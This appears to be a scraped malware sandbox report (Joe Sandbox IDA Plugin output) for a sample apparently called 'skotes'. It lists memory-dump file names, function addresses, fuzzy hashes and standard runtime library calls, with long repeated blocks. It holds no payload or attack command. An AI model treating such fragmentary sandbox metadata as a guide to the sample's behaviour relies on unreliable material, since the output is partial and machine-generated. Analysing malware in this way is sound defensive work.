Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: b080ca93a337c097e6dc9d791f1aa12818995425475cee62ff2b2a85432efc2e
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: 0901AD32600514ABCF16EA658856AFFBBA9AF44350F140015FC17AB382DE79EE00D6A0

Function 00759510 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00759519

Part of subcall function 0074F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00755486

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0075953D
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00759550
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00759559

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
Instruction ID: 30c1e19e26a3fd9c938ee95683ecdd42be7b7c45a8a03e9c26b12844c81a4318
Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
Instruction Fuzzy Hash: 83F0A730600A10DFE662AB588815FAB23949F40712F00841DED1B971C2DFACE85ACB81

Function 0076F35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0076F3A3

Strings

`'y, xrefs: 0076F375
8"y, xrefs: 0076F44B

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"y$`'y
API String ID: 3903695350-752720508
Opcode ID: 18c09668ce37790c6fcbd91a945a8e520947aa5f6c0f14483174c95bff54f6a9
Instruction ID: 08d18efe8b00d60ef6f41bd0982ffb53ee2aab345495df3e67fafffd9f10787b
Opcode Fuzzy Hash: 18c09668ce37790c6fcbd91a945a8e520947aa5f6c0f14483174c95bff54f6a9
Instruction Fuzzy Hash: C3316131600602EFDB21AB39E849B5B77E4EF00351F14842AE857E7A99DF78EC80CB11

Function 0076F1BF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0076F232
__freea.LIBCMT ref: 0076F298

Part of subcall function 0076B04B: RtlAllocateHeap.NTDLL(00000000,3EB2933D,?,?,0074D3FC,3EB2933D,?,00747A8B,?,?,?,?,?,?,00737465,?), ref: 0076B07E

Strings

Zv,mv, xrefs: 0076F1D2

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap__alloca_probe_16__freea
String ID: Zv,mv
API String ID: 809856575-1104218811
Opcode ID: e6146a6864e7cc6e89cc5985b6cf21ae8043e48d60465959f49db190651dd718
Instruction ID: 32653758975988071c6e0046e80db472d44093821c7c7be29b256ae5f7c42dbb
Opcode Fuzzy Hash: e6146a6864e7cc6e89cc5985b6cf21ae8043e48d60465959f49db190651dd718
Instruction Fuzzy Hash: B631AF71A0021AEFDB21AF65DC45EAF7BA9FF85310F054128FD16AB251DB388D51CBA0

Function 00761704 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00761764
std::invalid_argument::invalid_argument.LIBCONCRT ref: 007617AF

Strings

pContext, xrefs: 007617A7

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: 6c215770c16a63bafb2dffb248a010ac2145be06817a5ae6bd4c45e0e5950f7f
Instruction ID: 549aeada50f3ddba54d3457c257c5d1cf2d1ac96b0890234adb545089829338b
Opcode Fuzzy Hash: 6c215770c16a63bafb2dffb248a010ac2145be06817a5ae6bd4c45e0e5950f7f
Instruction Fuzzy Hash: F811033AA00214DBCB55FF68C88D96D77A9AF94360B598065EC03AB342DB7CED05CBD0

Function 00750C5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 00750CD7
Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 00750D2A

Strings

p[y, xrefs: 00750CCF

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
